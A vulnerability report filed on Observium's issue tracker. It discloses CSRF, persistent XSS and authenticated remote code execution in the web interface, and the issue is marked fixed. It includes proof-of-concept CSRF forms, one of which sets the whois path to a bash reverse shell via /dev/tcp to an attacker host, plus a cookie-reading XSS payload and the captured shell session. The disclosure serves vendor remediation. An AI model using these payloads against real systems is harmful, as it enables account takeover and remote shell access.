Uploaded image for project: 'Observium'
  1. Observium
  2. OBS-1821

Security issues: CSRF, Persistent XSS, Authenticated RCE

    XMLWordPrintable

Details

    • Bug
    • Status: Closed
    • Major
    • Resolution: Fixed
    • Community Edition
    • None
    • Web Interface
    • Observium CE 0.16.1.7533 (26th January 2016)

    Description

      Hello,

      There are several security issues that I'd like to point out to you in the Commercial version of Observium.
      The security issues are Cross Site Request Forgery, Persistent Cross Site Scripting and an Authenticated Remote Code Execution.

      1. CSRF
      due to lack of csrf protection, it is possible to create an additional administrator user, or change the current administrator password since it does not ask for the previous password before changing it.
      i.e. New password <Enter new pass> & Retype password <Enter new pass>
      instead of having to insert the older password.
      such an attack would look like this:

      <!--
      <html>
      <div align="center">
      <pre>

      <h2><b>Change admin password<b></h2>
      <body>
      <form
      action="http://observiumIP/edituser/user_id=1/"
      method="POST">
      <input type="hidden" name="action" value="changepass" />
      <input type="hidden" name="new_pass" value="test123" />
      <input type="hidden" name="new_pass2" value="test123" />
      <input type="submit" name="submit" value="save" />
      </form>
      </body>
      </div>
      </html>
      -->

      2. Persistent XSS
      Observium allows changing the MOTD message on the login page, however, it does not sanitize the message and it is possible to craft an XSS payload so whenever someone visits the page before logging in, it'll trigger a javascript
      Settings -> Web UI -> Login message -> <script>alert(document.cookie)</script>
      Logout -> XSS executed

      3. Authenticated remote code execution
      since (1)CSRF is possible, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8
      using any user on Observium (even low privileged) we can trigger a code execution. for example. I set up a listener on the attacker machine:
      root@pt:~# nc -lvp 4444
      listening on [any] 4444 ...

      and a CSRF which looks like this:

      <!--
      <html>
      <div align="center">
      <pre>

      <h2><b>CSRF<b></h2>
      <body>
      <form
      action="http://<observiumIP>/settings/section=paths/"
      method="POST">
      <input type="hidden" name="temp_dir" value="" />
      <input type="hidden" name="varset_temp_dir" value="" />
      <input type="hidden" name="varset_rrdtool" value="" />
      <input type="hidden" name="fping" value="" />
      <input type="hidden" name="varset_fping" value="" />
      <input type="hidden" name="fping6" value="" />
      <input type="hidden" name="varset_fping6" value="" />
      <input type="hidden" name="svn" value="" />
      <input type="hidden" name="varset_svn" value="" />
      <input type="hidden" name="snmpget" value="" />
      <input type="hidden" name="varset_snmpget" value="" />
      <input type="hidden" name="snmpwalk" value="" />
      <input type="hidden" name="varset_snmpwalk" value="" />
      <input type="hidden" name="snmpbulkget" value="" />
      <input type="hidden" name="varset_snmpbulkget" value="" />
      <input type="hidden" name="snmpbulkwalk" value="" />
      <input type="hidden" name="varset_snmpbulkwalk" value="" />
      <input type="hidden" name="snmptranslate" value="" />
      <input type="hidden" name="varset_snmptranslate" value="" />
      <input type="hidden" name="ipmitool" value="" />
      <input type="hidden" name="varset_ipmitool" value="" />
      <input type="hidden" name="virsh" value="" />
      <input type="hidden" name="varset_virsh" value="" />
      <input type="hidden" name="wmic" value="" />
      <input type="hidden" name="varset_wmic" value="" />
      <input type="hidden" name="git" value="" />
      <input type="hidden" name="varset_git" value="" />
      <input type="hidden" name="whois" value="bash -i >& /dev/tcp/<attackerip>/4444 0>&1; exit" />
      <input type="hidden" name="varset_whois" value="" />
      <input type="hidden" name="whois_custom" value="1" />
      <input type="hidden" name="file" value="" />
      <input type="hidden" name="varset_file" value="" />
      <input type="hidden" name="dot" value="" />
      <input type="hidden" name="varset_dot" value="" />
      <input type="submit" name="submit" value="save" />
      </form>
      </body>
      </div>
      </html>

      by visiting http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the whois parameter 'bash -i >& /dev/tcp/<attackerip>/4444 0>&1; exit which gives us a reverse shell on the machine:

      listening on [any] 4444 ...
      192.168.2.155: inverse host lookup failed: Unknown host
      connect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413
      bash: no job control in this shell
      bash: /root/.bashrc: Permission denied
      bash-4.1$ ls -l /opt
      ls -l /opt
      total 48944
      drwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium
      rw-rr- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz
      drwxr-xr-x. 2 root root 4096 Mar 26 2015 rh
      bash-4.1$

      Attachments

        Issue Links

          Activity

            People

              landy Mike Stupalov
              Dolev Dolev Farhi
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: